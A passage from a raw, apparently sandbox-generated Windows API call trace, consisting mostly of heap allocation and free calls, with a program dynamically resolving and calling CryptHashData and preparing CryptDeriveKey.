hHeap=0x970000) returned 1 [0185.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50710 [0185.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0185.906] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0185.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0185.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0185.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0185.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0185.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0185.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0185.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0185.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0185.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0185.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0185.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0185.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0185.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0185.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0185.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0185.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0185.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0185.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0185.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0185.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0185.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0185.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0185.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0185.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0185.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0185.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0185.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0185.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0185.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0185.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0185.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0185.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0185.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0185.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0185.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0185.908] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0185.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0185.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0185.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0185.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0185.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0185.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0185.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0185.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0185.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0185.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0185.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0185.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0185.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0185.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0185.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0185.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0185.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0185.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0185.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0185.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0185.909] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0185.909] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e50ae8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0185.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0185.910] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0185.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0185.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0185.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0185.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0185.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0185.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0185.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0185.910] CryptHashData (hHash=0xa874d0, pbData=0x2e54d48, dwDataLen=0x3, dwFlags=0x1) returned 1 [0185.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0185.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0185.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0185.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0185.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0185.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0185.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0185.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0185.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0185.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0185.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0185.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0185.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0185.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0185.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0185.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0185.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0185.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0185.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0185.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0185.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0185.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0185.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0185.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0185.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0185.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0185.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0185.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0185.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0185.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0185.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0185.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0185.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0185.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0185.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977998 | out: hHeap=0x970000) returned 1 [0185.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0185.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0185.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0185.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0185.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0185.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0185.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0185.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0185.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0185.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0185.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0185.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0185.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0185.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0185.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0185.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0185.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0185.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0185.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0185.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0185.913] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0185.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0185.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0185.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0185.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0185.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0185.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0185.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0185.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0185.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0185.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0185.914] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0185.914] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0185.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0185.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0185.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0185.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fff0 [0185.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0185.914] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0185.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fff0 | out: hHeap=0x970000) returned 1 [0185.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0185.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50b18 [0185.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0185.914] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0185.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0185.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0185.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0185.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0185.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0185.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0185.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0185.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0185.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0185.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0185.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0185.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0185.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0185.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0185.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0185.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0185.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0185.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0185.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0185.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0185.916] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0185.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50bd8 [0185.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0185.916] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0185.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0185.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0185.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0185.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0185.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0185.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0185.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0185.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0185.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0185.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0185.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0185.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0185.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0185.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0185.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0185.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0185.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0185.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0185.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0185.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0185.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0185.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0185.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0185.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0185.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0185.917] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0185.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0185.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0185.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0185.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0185.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0185.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0185.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0185.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0185.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0185.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0185.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0185.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0185.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0185.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0185.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0185.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0185.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0185.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0185.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0185.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0185.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0185.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0185.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0185.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0185.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0185.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0185.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0185.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0185.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0185.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0185.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0185.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0185.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0185.919] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0185.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e50c20 [0185.919] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 